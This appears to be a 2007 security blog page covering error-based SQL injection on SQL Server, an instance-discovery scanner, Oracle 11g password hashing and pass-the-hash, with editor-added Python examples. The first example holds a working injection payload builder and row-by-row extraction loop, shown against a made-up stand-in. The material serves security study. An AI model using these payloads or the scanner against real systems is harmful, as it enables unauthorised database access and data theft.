cqure.net

Simplifying enumeration by error messages

November 28th, 2007 by Patrik Karlsson

I have been experimenting with SQL-injection and information enumeration through error messages for a while.
The idea was to simplify the process of extracting data so that very little application logic would be needed to perform the task: the database does the selecting and the error message does the reporting. Ideally a simple 3-5 line bash script wrapping wget or curl should do the trick.
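To make the "very little application logic" point concrete, here is the whole client side of one such extraction loop, written as an added example for this edit (it is not the author's script, and the parameter, error wording and table names in it are made up or constructed). SQL Server reports the offending string verbatim when a text value is forced into an integer, so a payload that selects one row into CONVERT(int, ...) plus a regular expression over the response is all the logic there is. The HTTP round trip is replaced by a constructed stand-in so the script runs offline; in practice fetch would be a curl or urllib call against the vulnerable parameter.

```python
import re

# SQL Server leaks the offending string in its conversion error. Two wordings exist:
#   2000:  "Syntax error converting the nvarchar value 'X' to a column of data type int."
#   2005+: "Conversion failed when converting the nvarchar value 'X' to data type int."
ERROR_RE = re.compile(
    r"converting the n?varchar value '([^']*)' to (?:a column of )?data type int",
    re.IGNORECASE,
)


def build_payload(skip):
    """Injected fragment that forces the (skip+1)-th user table name into CONVERT(int, ...).

    Assumes a quoted string parameter: the leading quote closes the original literal and
    the trailing comment discards the rest of the query (adjust for the real target).
    """
    return (
        "' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U' "
        f"AND name NOT IN (SELECT TOP {skip} name FROM sysobjects WHERE xtype='U' ORDER BY name) "
        "ORDER BY name))--"
    )


def extract_leaked_value(body):
    """Return the string quoted in the error message, or None if the page carries no such error."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


# Constructed stand-in for the HTTP request so the example runs offline. Real use would be
# something like: fetch = lambda p: urllib.request.urlopen(URL + urllib.parse.quote(p)).read().decode()
FAKE_TABLES = ["customers", "orders", "users"]


def fake_fetch(payload):
    skip = int(re.search(r"SELECT TOP (\d+) name FROM sysobjects WHERE xtype='U' ORDER BY name\)",
                         payload).group(1))
    if skip < len(FAKE_TABLES):
        return ("<html>Error: Conversion failed when converting the nvarchar value "
                f"'{FAKE_TABLES[skip]}' to data type int.</html>")
    # Subquery returns NULL: CONVERT(int, NULL) raises no error, the page just comes back empty.
    return "<html>No results.</html>"


def enumerate_tables(fetch=fake_fetch, limit=1000):
    """Walk the result set one row per request until the error message stops appearing."""
    found = []
    while len(found) < limit:
        name = extract_leaked_value(fetch(build_payload(len(found))))
        if name is None:
            break
        found.append(name)
    return found


if __name__ == "__main__":
    for table in enumerate_tables():
        print(table)
```

Two things bite in practice and are worth checking before blaming the payload: applications that swallow database errors and return a generic page give the loop nothing to parse (error-based extraction then has to give way to blind or out-of-band techniques), and some frameworks HTML-encode the quotes in the message, so the regular expression has to be adjusted to what the page actually returns.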


MSSQLScan 0.6 release

October 17th, 2007 by Patrik Karlsson

I finally got around to publishing a tool, which, for a number of reasons, has not happened for quite some time now. The MSSQLScan tool scans for Microsoft SQL Server *surprise*. It does so using UDP (the SQL Server resolution service on UDP port 1434), which means that it can either discover servers by hitting a broadcast address or by querying each and every host. This will make sure that you find all instances, including servers that no longer listen on TCP port 1433 due to dynamic port allocation.
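The UDP exchange behind this kind of scanner is small enough to show in full. The following is an added example written for this edit, not MSSQLScan's own code: the client sends a single byte to UDP 1434 (0x02 to a broadcast address, 0x03 to one host) and every SQL Server resolution service that hears it answers with a 0x05 packet carrying a semicolon-delimited list of its instances, including the TCP port each one is currently bound to. The sample reply is constructed (the host name, versions and ports are made up) so the parser can be exercised without a server; discover() does the real network round trip.

```python
import socket
import struct

SSRP_PORT = 1434
CLNT_BCAST_EX = b"\x02"   # "everybody answer": sent to a broadcast address
CLNT_UCAST_EX = b"\x03"   # "list all your instances": sent to one host


def parse_svr_resp(packet):
    """Parse an SVR_RESP: 0x05, little-endian length, then ';'-delimited ASCII text."""
    if len(packet) < 3 or packet[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP packet")
    (size,) = struct.unpack_from("<H", packet, 1)
    text = packet[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for entry in text.split(";;"):          # one instance per ";;"-terminated record
        entry = entry.strip(";")
        if not entry:
            continue
        fields = entry.split(";")           # key;value;key;value;...
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def tcp_endpoint(instance):
    """(host, port) the instance actually listens on, or None when TCP is disabled."""
    if "tcp" not in instance:
        return None
    return instance.get("ServerName"), int(instance["tcp"])


def discover(address, broadcast=False, timeout=2.0):
    """Send one request and collect every reply until the socket times out."""
    request = CLNT_BCAST_EX if broadcast else CLNT_UCAST_EX
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    if broadcast:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    sock.sendto(request, (address, SSRP_PORT))
    found = {}
    try:
        while True:
            data, (src, _) = sock.recvfrom(65535)
            found.setdefault(src, []).extend(parse_svr_resp(data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


# Constructed reply (no real host): a default instance on 1433 and a named one on a dynamic port.
SAMPLE_TEXT = ("ServerName;DBSRV01;InstanceName;MSSQLSERVER;IsClustered;No;Version;9.00.1399.06;tcp;1433;;"
               "ServerName;DBSRV01;InstanceName;SQLEXPRESS;IsClustered;No;Version;9.00.3042.00;tcp;49153;"
               "np;\\\\DBSRV01\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;")
SAMPLE_PACKET = b"\x05" + struct.pack("<H", len(SAMPLE_TEXT)) + SAMPLE_TEXT.encode("ascii")

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_PACKET):
        print(inst["InstanceName"], tcp_endpoint(inst))
```

The port in the tcp field is what matters for a follow-up TCP scan: a named instance on a dynamic port is invisible to a plain 1433 sweep but shows up here as long as the resolution service on 1434/udp is reachable. If that service is blocked or disabled, nothing answers and the scanner is back to brute-forcing ports.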

As usual, you're more than welcome to provide me with feedback, suggestions or bug reports.

T2 Security Conference

October 17th, 2007 by Patrik Karlsson

I attended the T2 security conference last Friday where I presented a talk on SQL injection and out-of-band channelling. Unfortunately I wasn’t able to stay for the whole conference but the talks I attended were very good. Make sure to check it out next year. Hopefully, I will have a chance to publish my updated slides during this week.

Oracle 11g password security

September 24th, 2007 by Patrik Karlsson

Finally, Oracle has changed the way it stores passwords. Oracle 11g introduces a different algorithm (SHA-1), supports mixed-case passwords and salts the stored hashes. This all sounds great EXCEPT that the old, weaker hashes are still stored in the sys.user$ table.

It seems as if several people have been looking into this at more or less the same time and have documented their efforts. One of them is Pete Finnigan (http://www.petefinnigan.com/weblog/archives/00001097.htm). Recurity Labs have done a more technical analysis of the 150 MB Oracle Linux binary (http://www.phenoelit.net/lablog/oracle.sl) and conclude their work with this excellent comment:

“And we would like to welcome Oracle Corp. in the year 2007, the century of highly advanced, mixed-case passwords. :) It should be noted that Oracle, in fine tradition, makes the same mistake Microsoft did a decade ago when they put the insecure LANMAN hash next to the brand new NTLM one. The table sys.user$ still holds the case insensitive DES encrypted password version next to the new one.”
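For reference, this is what the new hash looks like when built by hand. It is an example added for this edit, not Oracle code and not from the analyses linked above; the password and salt are constructed. The 11g value lives in sys.user$.spare4 as "S:" followed by SHA-1(password || salt) and the 10-byte salt, both as upper-case hex, so the salt is recoverable from the stored value and the password is compared case-sensitively. What the example cannot fix is the point above: the case-insensitive DES-based hash of the same password still sits in the password column of the same row, so anyone who can read sys.user$ simply attacks that one instead.

```python
import hashlib
import os


def oracle11g_hash(password, salt=None):
    """Build a sys.user$.spare4 value: 'S:' + hex(SHA1(password || salt)) + hex(salt)."""
    if salt is None:
        salt = os.urandom(10)               # Oracle uses a 10-byte random salt per password
    if len(salt) != 10:
        raise ValueError("11g salt is 10 bytes")
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest().upper()
    return "S:" + digest + salt.hex().upper()


def split_11g_hash(spare4):
    """Return (digest_bytes, salt_bytes) from an 'S:' value, or raise if it is not one."""
    if not spare4.upper().startswith("S:") or len(spare4) != 62:
        raise ValueError("not an Oracle 11g S: hash")
    return bytes.fromhex(spare4[2:42]), bytes.fromhex(spare4[42:])


def verify_11g(password, spare4):
    """True when the password reproduces the stored value; case matters, unlike the old hash."""
    _, salt = split_11g_hash(spare4)
    return oracle11g_hash(password, salt) == spare4.upper()


# Constructed demo values (not taken from a real database).
DEMO_SALT = bytes.fromhex("0102030405060708090A")
DEMO_HASH = oracle11g_hash("Tiger2007", DEMO_SALT)

if __name__ == "__main__":
    print(DEMO_HASH)
    print(verify_11g("Tiger2007", DEMO_HASH), verify_11g("tiger2007", DEMO_HASH))
```

Note that a single unsalted SHA-1 round is cheap to brute-force; the salt only stops precomputed tables, so the improvement over the old scheme is real but modest even before the old hash is taken into account.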

Passing-the-hash for everyone

August 16th, 2007 by Patrik Karlsson

Core Security released their PSH (pass-the-hash) toolkit today. Even though the concept of passing the hash is old, few tools putting it into practice have been available to the public. A number of companies working within the security industry have had their own tools, some being more proud of them than others ;) I myself attempted to write a generic proxy implementation for this in 2001 and published it here on cqure.net. It worked alright at the time, but has not done so for quite a while now.

In short, passing the hash lets you extract password hashes from a Windows system and use them, without ever knowing the cleartext password, to authenticate to other Windows systems on which the same accounts and passwords are valid. The hash is never "decrypted"; NTLM authentication only ever needs the hash itself, so the hash is the credential. The risk associated with this should be obvious to most people.